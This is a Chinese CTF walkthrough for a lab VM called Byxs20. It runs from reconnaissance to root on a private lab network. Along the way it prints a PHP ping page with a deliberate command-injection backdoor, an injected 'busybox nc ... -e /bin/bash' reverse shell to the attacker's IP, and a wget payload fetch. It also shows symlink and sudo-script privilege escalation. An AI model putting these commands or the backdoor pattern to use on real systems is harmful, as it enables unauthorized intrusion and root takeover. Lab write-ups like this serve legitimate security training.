1. 信息搜集
2. 80端口

信息搜集

arp-scan -l 扫描靶机ip

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:3d:c2:d3       PCS Systemtechnik GmbH
192.168.31.149  08:00:27:9e:3d:15       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.406 seconds (106.40 hosts/sec). 3 responded

然后nmap扫描一下开放端口

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.149
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-20 06:02 EDT
Nmap scan report for 192.168.31.149
Host is up (0.0018s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:9E:3D:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds

80端口

gobuster扫描一下目录

┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "192.168.31.149" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.tx
t -x .php,.txt,.jpg
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.149
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/templates            (Status: 301) [Size: 320] [--> http://192.168.31.149/templates/]
/template.php         (Status: 200) [Size: 258]
/conf                 (Status: 301) [Size: 315] [--> http://192.168.31.149/conf/]
/ping.php             (Status: 200) [Size: 11]

/template.php有一个虚假的文件包含（后面拿到shell之后查看文件可以知道）,ping.php可以执行ping命令，fuzz一下参数

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arjun -u "http://192.168.31.149/ping.php"
    _
   /_| _ '
  (  |/ /(//) v2.2.7
      _/

[*] Scanning 0/1: http://192.168.31.149/ping.php
[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Logicforcing the URL endpoint
[✓] parameter detected: debug, based on: http headers
[+] Parameters found: debug

找到一个debug参数（其实一开始是想fuzz出了拼接ip的参数的，误打误撞），ip的参数就是ip

1	http://192.168.31.149/ping.php?debug&ip=;ls

可以拼接执行命令

#ping.php
<?php
// diag.php - 表面严格校验，实际暗藏调试后门
$ip = $_GET['ip'] ?? '';

// 暗桩触发条件：只要携带debug参数
if(isset($_GET['debug'])){
    // 关闭错误提示避免暴露路径
    error_reporting(0);
    
    // 输出详细系统信息（伪装成调试模式）
    echo "<pre>";
    echo "[*] Debug Mode Activated\n";
    echo "[+] Raw Command: ping -c 3 " . $ip . "\n";
    
    // 直接拼接命令执行（无任何过滤）
    system("ping -c 3 " . $ip);
    
    // 泄漏敏感信息
    echo "\n\n=== System Info ===\n";
    echo "PHP User: " . shell_exec('whoami');
    echo "PHP Version: " . phpversion() . "\n";
    echo "Disable Functions: " . ini_get('disable_functions') . "\n";
    echo "</pre>";
    exit;
}

// 主功能：严格IPv4正则验证（无懈可击）
if (!preg_match('/^(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)$/', $ip)) {
    die("Invalid IP!");
}

// 安全执行命令（无注入可能）
$cmd = ['ping', '-c', '3', $ip];
system(escapeshellcmd(implode(' ', $cmd)));
?>

然后用busybox反弹shell

1	;busybox%20nc%20192.168.31.129%204444%20-e%20/bin/bash

拿到shell之后，查看sudo -l

www-data@Byxs20:/tmp$ sudo -l
Matching Defaults entries for www-data on Byxs20:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bi
n

User www-data may run the following commands on Byxs20:
    (ALL : ALL) NOPASSWD: /usr/sbin/reboot

可以执行reboot

上传一个pspy监控一下进程

1	www-data@Byxs20:/tmp$ busybox wget 192.168.31.129/pspy64

可以看到root用户将/var/www/html/conf/apache2.conf.bak 复制到了/etc/apache2/apache2.conf

1	2025/04/20 06:11:01 CMD: UID=0 PID=749 \| /bin/sh -c cp /var/www/html/conf/apache2.conf.bak /etc/apache2/apache2.conf

apache2.conf.bak文件是我们可控的，后面经过群主提醒我才幡然醒悟，可以做一个软连接啊，/etc/apache2/apache2.conf我们是可读的

www-data@Byxs20:/var/www/html/conf$ ln -sf /home/welcome/user.txt apache2.conf.bak
www-data@Byxs20:/var/www/html/conf$ cat /etc/apache2/apache2.conf
flag{user-05659dca555d4ddbc396b319645f3d2a}
www-data@Byxs20:/var/www/html/conf$ ln -sf /root/root.txt apache2.conf.bak
www-data@Byxs20:/var/www/html/conf$ cat /etc/apache2/apache2.conf
flag{root-f9ef88715e3bbec612f9f88d64ae3a99}

另一个思路就是修改apache2.conf.bak，将web服务以welcome的权限运行，将apacke2.conf.bak里面的User和Group修改一下

1 2	User welcome Group welcome

然后上传再重启靶机，然后再次反弹shell会发现用户变成welcome了（这里不能修改成root，是因为apache2默认不允许root启动，如果要root启动，需要添加“-DBIG_SECURITY_HOLE”到CFLAGS环境变量中重新编译）

1 2	id uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)

查看sudo -l

welcome@Byxs20:/home/welcome$ sudo -l
sudo -l
Matching Defaults entries for welcome on Byxs20:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Byxs20:
    (ALL : ALL) NOPASSWD: /usr/sbin/reboot
    (ALL : ALL) NOPASSWD: /home/welcome/test/test

就是王炸方案，将test目录换一个名再新创建一个test/test

welcome@Byxs20:/home/welcome$ mv test 1
mv test 1
welcome@Byxs20:/home/welcome$ mkdir test
mkdir test
welcome@Byxs20:/home/welcome$ echo 'bash -p'>test/test
echo 'bash -p'>test/test
welcome@Byxs20:/home/welcome$ chmod +x test/test
chmod +x test/test
welcome@Byxs20:/home/welcome$ sudo /home/welcome/test/test
sudo /home/welcome/test/test
root@Byxs20:/home/welcome#

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可

lvzhouhang

群友机-Byxs20

信息搜集

80端口